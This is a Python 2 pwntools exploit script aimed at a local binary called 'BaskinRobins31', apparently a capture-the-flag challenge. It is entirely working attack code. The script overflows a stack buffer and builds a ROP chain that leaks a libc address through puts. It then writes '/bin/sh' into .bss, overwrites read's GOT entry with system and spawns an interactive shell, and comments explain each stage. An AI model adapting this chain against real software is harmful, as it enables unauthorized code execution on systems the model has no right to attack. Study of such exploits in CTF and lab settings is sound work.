from pwn import *
# Proof-of-concept ROP chain against the local "BaskinRobins31" binary.
# Python 2 / legacy pwntools syntax throughout: `print` statements and
# str + p64() concatenation (p64 returns bytes under Python 3, so this
# script does not run unmodified there).
s = process("./BaskinRobins31")
# Symbol offsets are taken from the libc shipped next to the binary; the
# arithmetic below is only valid if this is the libc the process loads.
libc = ELF("./libc")
elf = ELF("./BaskinRobins31")
s.recvuntil("How many numbers do you want to take ? (1-3)")
cmd = "/bin/sh\x00"
# Gadget addresses inside the (non-PIE, presumably) target binary — taken
# as given here, not re-derived from the ELF.
pop_rdi = 0x00400bc3
pop_rdx = 0x0040087c
pop_rbp = 0x0040087f
pop_rsi_r15 = 0x00400bc1
main = 0x400A4B
# Debugging hook: attaches gdb to the child before the payload is sent.
# Blocks in non-interactive runs; remove when not debugging.
gdb.attach(s)
# Filler up to the saved return address; 184 is presumably the buffer
# size plus saved rbp from the target's stack frame — confirm with the
# binary, and note that this only works without a stack canary.
pay = "A"*184
# Stage 1: puts(puts@got) — leaks the runtime address of puts, which
# defeats ASLR for the libc mapping.
pay += p64(pop_rdi)
pay += p64(elf.got['puts'])
pay += p64(elf.plt['puts'])
# Stage 2: read(0, bss+0x10, len(cmd)) — stores cmd in writable .bss.
pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi_r15)
pay += p64(elf.bss()+0x10)
pay += p64(0)
pay += p64(pop_rdx)
pay += p64(len(cmd))
pay += p64(elf.plt['read'])
# Stage 3: read(0, read@got, 4) — overwrites the low 4 bytes of read's
# GOT slot. This is possible only while the GOT is writable (no Full
# RELRO); the upper 4 bytes are left as-is, relying on them matching.
pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi_r15)
pay += p64(elf.got['read'])
pay += p64(0)
pay += p64(pop_rdx)
pay += p64(4)
pay += p64(elf.plt['read'])
# Stage 4: read@plt now resolves through the patched GOT entry, so this
# call is effectively <patched target>(bss+0x10).
pay += p64(pop_rdi)
pay += p64(elf.bss()+0x10)
pay += p64(elf.plt['read'])
s.sendline(pay)
# Skip the program's own output up to the leaked pointer; the leading
# 2 bytes discarded by recv(2) are presumably a newline/separator.
s.recvuntil("Don't break the rules...:(")
s.recv(2)
# 6 leaked bytes padded to a u64 (x86-64 user-space pointers fit in 48 bits).
puts_libc = u64(s.recv(6)+"\x00\x00")
print "puts_libc : " + hex(puts_libc)
libc_base = puts_libc - libc.symbols['puts']
system = libc_base + libc.symbols['system']
print "libc_base : " + hex(libc_base)
print "system : " + hex(system)
# Feeds stage 2 (cmd) and stage 3 (GOT patch) in order. Only 4 of the
# 8 bytes of p64(system) are consumed by the 4-byte read; the remaining
# bytes stay buffered on stdin.
s.send(cmd)
s.send(p64(system))
s.interactive()